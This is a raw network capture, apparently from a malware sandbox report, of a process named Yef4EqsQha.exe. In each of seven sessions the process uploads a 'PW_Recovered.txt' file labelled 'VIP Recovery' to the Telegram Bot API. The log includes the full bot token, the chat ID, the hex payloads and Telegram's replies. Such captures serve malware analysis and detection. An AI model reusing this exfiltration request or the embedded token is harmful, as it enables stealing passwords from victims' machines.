                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.749996149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:07 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd339547c57964
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:07 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 39 35 34 37 63 35 37 39 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd339547c57964Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:08 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:08 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:08 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 39 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":40996,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546828,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.749997149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:08 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd33a4dfa3e873
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:08 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 61 34 64 66 61 33 65 38 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd33a4dfa3e873Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:09 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:09 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:09 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 39 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":40997,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546829,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.749998149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:09 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd33b470d7c755
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:09 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 62 34 37 30 64 37 63 37 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd33b470d7c755Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:10 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:10 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:10 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 39 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":40998,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546830,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.749999149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:10 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd33c3fb5a06a6
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:10 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 33 66 62 35 61 30 36 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd33c3fb5a06a6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:11 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:10 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:11 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 39 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":40999,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546830,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.750000149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:11 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd33d37f258c37
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:11 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 64 33 37 66 32 35 38 63 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd33d37f258c37Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:15 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:14 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:15 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41000,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546834,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.750001149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:15 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3420b602a22e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:15 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 32 30 62 36 30 32 61 32 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3420b602a22eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:15 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:15 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:15 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41001,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546835,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.750002149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:16 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3433ee6a7188
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:16 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 33 33 65 65 36 61 37 31 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3433ee6a7188Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:16 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:16 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:16 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41002,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546836,"document"


